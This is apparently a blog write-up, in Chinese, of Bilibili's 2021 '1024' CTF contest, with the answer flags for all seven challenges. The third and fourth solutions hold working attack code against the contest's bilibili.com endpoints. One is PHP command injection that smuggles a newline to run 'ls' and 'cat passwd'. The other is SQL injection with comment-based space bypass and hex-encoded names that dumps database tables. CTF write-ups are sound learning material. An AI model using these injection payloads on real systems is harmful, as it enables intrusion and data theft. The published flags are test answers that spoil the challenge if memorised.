當爬蟲工程師遇到 CTF丨B 站 1024 安全攻防題解

K哥爬蟲發表於2021-10-28

答案參考

  • 第一題:a1cd5f84-27966146-3776f301-64031bb9
  • 第二題:36c7a7b4-cda04af0-8db0368d-b5166480
  • 第三題:9d3c3014-6c6267e7-086aaee5-1f18452a
  • 第四題:3d5dd579-0678ef93-18b70cae-cabc5d51
  • 第五題:516834cc-50e448af-bcf9ed53-9ae4328e
  • 第六題:b13981f4-5ae996d4-bc04be5b-34662a78
  • 第七題(部分 IP,可拿 10 分):bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.bcf,bfh.ff.dj.bd,bfh.ff.dj.fb,bfh.ff.dj.ig,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,jj.bdc.bbb.cc

最近看到嗶哩嗶哩上線了一個 1024 程式設計師節的活動,其中有一個技術對抗賽,對抗賽又分為演算法與安全答題和安全攻防挑戰賽,其中安全攻防挑戰賽裡面有 7 個題,其中有 APP 逆向和解密的題目,作為爬蟲工程師,逆向分析的技能也是必須要有的,於是 K 哥就以爬蟲工程師的角度,嘗試做了一下其中逆向相關的兩個題,發現逆向不是很難,分享一下思路給大家。

(以爬蟲工程師的角度分析安全攻防的題,網安大佬勿噴!部分題目解題思路來源於網安大佬)

01.png


第一題:加密解密

第一題就給了一串密文,什麼提示也沒有,作為爬蟲工程師,K 哥熟練的開啟了 F12,翻了翻原始碼,這裡是一個 form 表單,method="post",下面還有一個 id 為 success 的 div 標籤,於是初步懷疑是不是把密文解密後傳送個 POST 請求,然後 flag 就會顯示在這個 id 為 success 的 div 標籤下呢?有了想法,K 哥就熟練的翻起了 JS 程式碼,因為我們爬蟲遇到最多的就是 JS 加密嘛,然後發現就載入了 jQuery 和一個 common.js 檔案,無論是搜尋標籤還是怎樣,都沒有什麼有用的資訊。

02.png

既然不存在 JS 加密,那應該就是硬解密文了,觀察這是兩段 48 位的密文,也有可能是一段 96 位的密文,而且沒有 == 之類的特殊符號,那麼就不可能是最簡單的 MD5,不過 K 哥還是試了試,將其拆成 6 個 16 位、3 個 32 位等組合,發現都不是 MD5,於是又嘗試了多種加密演算法,一段作為 KEY,一段作為密文,或者整段組合成密文,SHA、HMAC、RC4 等演算法都不行,再仔細觀察網頁,K 哥懷疑這個 happy_1024_2233 是不是也是加密的一部分呢?會不會是鹽值(IV 值,也叫偏移量)?會不會它才是 KEY?結果多種嘗試,最終才得出結論:

  • 加密方式:AES 加密
  • 加密模式:ECB
  • 填充方式:無影響,都可以
  • Key:happy_1024_2233
  • 96 位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156
  • 輸出方式:Hex(十六進位制)

解密結果(flag):a1cd5f84-27966146-3776f301-64031bb9

有關各種加密演算法原理與實現可以檢視 K 哥往期的文章:【爬蟲知識】爬蟲常見加密解密演算法

03.png


第二題:前端配置項

第二題的 flag 是 36c7a7b4-cda04af0-8db0368d-b5166480,就在 home.vue 頁面的註釋裡,如下圖所示:

04.png


第三題:最好的語言

第三題說 PHP 是世界上最好的語言,給了個 eval.php,如圖所示:

05.png

本題解題思路來源於網安大佬,下載 eval.php,可以看到正則 /^\w+$/,這個可以用結尾接換行符匹配,然後就可以換行用 Linux 命令了:

06.png

使用根目錄命令 ls 一下,向 http://security.bilibili.com/...[]=1%0a&args[]=ls 傳送 GET 請求:

import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls"
response = requests.get(url=url)
print(response.text)

返回內容:

1.txt
passwd
data
config

flag 在 passwd 裡,其他就不看了,所以直接使用 Linux 命令 cat passwd,向 http://security.bilibili.com/...[]=1%0a&args[]=cat&args[]=passwd 傳送 GET 請求:

import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd"
response = requests.get(url=url)
print(response.text)

返回 flag:9d3c3014-6c6267e7-086aaee5-1f18452a


第四題:SQL 注入

本題解題思路來源於網安大佬,給的網址和第二題一樣,找一下網頁上的按鈕,點日誌資訊可看到日誌請求,可以從日誌 api 入手,抓包日誌 api 為:https://security.bilibili.com/sec1024/q/admin/api/v1/log/list,繞過空格過濾嘗試通過且回顯,Python 傳送 POST:

PS:注意每次請求 user_name 欄位的變化

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,5",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

返回內容:

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "5",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

獲取表名:

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

返回內容,可以得到 flag、log、user:

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "flag,log,user",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

獲取 flag 表的欄位,由於不能引號所以用十六進位制繞過,flag 十六進位制即 666c6167

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name=0x666c6167#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

返回內容可以得到一個欄位,id:

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "id",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

最後直接拿下 flag:

import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {
    "user_id": "",
    "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(id)/**/from/**/flag#",
    "action": "",
    "page": 1,
    "size": 20
}

response = requests.post(url=url, json=json_data)
print(response.text)

返回內容 3d5dd579-0678ef93-18b70cae-cabc5d51 為 flag:

{
     "code": 200,
     "data": {
          "res_list": [
               {
                    "action": "4",
                    "id": "q",
                    "time": "3d5dd579-0678ef93-18b70cae-cabc5d51",
                    "user_id": "test@10.34.12.128",
                    "user_name": "3"
               }
          ],
          "total": 1
     },
     "msg": ""
}

第五題:APP 逆向

第五題是一個安卓逆向題,如圖所示:

07.png

扔到模擬器看看,大概是輸入賬號密碼,錯誤的話提示“還差一點點~~”,正確的話應該就能拿到 flag 了。

08.png

直接把 apk 扔到 JADX 裡看看,沒有混淆,程式碼一目瞭然,尤其這個 Encrypt 最為顯眼:

09.png

10.png

分析程式碼:MainActivity.java 裡,輸入賬號密碼賦值給 obj 和 obj2,再依次呼叫 Encrypt.java 裡的方法進行按位異或 3 的運算和 base64 編碼,然後使用 Arrays.equals 方法將處理後的賬號密碼與正確的賬號密碼進行對比,正確就輸出 bilibili- ( ゜- ゜)つロ 乾杯~,不是很複雜,可以使用 Java 復現,也可以使用 Python 逆向倒推正確的賬號密碼,使用 Python 復現的時候要注意,給出的正確賬號密碼是 Java 的兩個位元組陣列,在 Python 中是沒有位元組陣列這個概念的,Python 和 Java 位元組的取值範圍也不同,Python3 是 0~256,Java 是 -127~128,所以在轉換的時候注意需要移動 256 位,Python 推導完整程式碼如下:

import base64

byte_arr1 = [78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61]
byte_arr2 = [89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61]

byte_arr1_ = bytes(b % 256 for b in byte_arr1)
byte_arr2_ = bytes(b % 256 for b in byte_arr2)

bs64_arr1 = base64.b64decode(byte_arr1_)
bs64_arr2 = base64.b64decode(byte_arr2_)

username = password = ""

for i in range(len(bs64_arr1)):
    username += chr(bs64_arr1[i] ^ 3)

for i in range(len(bs64_arr2)):
    password += chr(bs64_arr2[i] ^ 3)

print("username: ", username)
print("password: ", password)
print("flag: ", username + "-" + password)

輸出:

username:  516834cc-50e448af
password:  bcf9ed53-9ae4328e
flag:  516834cc-50e448af-bcf9ed53-9ae4328e

在模擬器 APP 中輸入賬號密碼測試成功:

11.png


第六題:IDA 逆向 SO

第五題和第六題題目雖然是一樣的,但是 flag 不一樣,第六題需要逆向 SO,會驗證 abi 和系統版本,改 build.prop,ro.product.cpu.abi 為 x86,ro.build.version.release 為 9,然後再建立 /data/2233,4 byte 一組就會變成 flag:b13981f4-5ae996d4-bc04be5b-34662a78


第七題:風控惡意 IP

12.png

最後一題是找到所有的惡意 IP 後,通過通過英文逗號分隔成一個字串後提交,系統會根據提交的 IP 正確數計算分數,這個題不知道具體怎麼判斷,K 哥嘗試了使用 Python 把所有 IP 提取出來之後放到 Excel 裡找出重複次數過多的 IP:

bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.bcf,bfh.ff.dj.bd,bfh.ff.dj.fb,bfh.ff.dj.ig,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,jj.bdc.bbb.cc

這個答案只得了 10 分,實際上好像只要有一個正確的就是 10 分,滿分是 20 分,可能有錯的或者少的,這個題肯定沒這麼簡單,肯定還要利用其他判斷方法的,比如判斷 UA、Path、Referer、同一個 UA 不同 IP 多次訪問等,如果有思路的大佬可以評論講一下。


總結

部分題目比較簡單,只不過沒有提示,像第一題就需要熟練掌握各種加密演算法才能很快推斷出加密方式,否則只能一個一個去試了,剩下的題就需要一定的網路安全知識了,各位爬蟲大佬們也可以去試試。


相關文章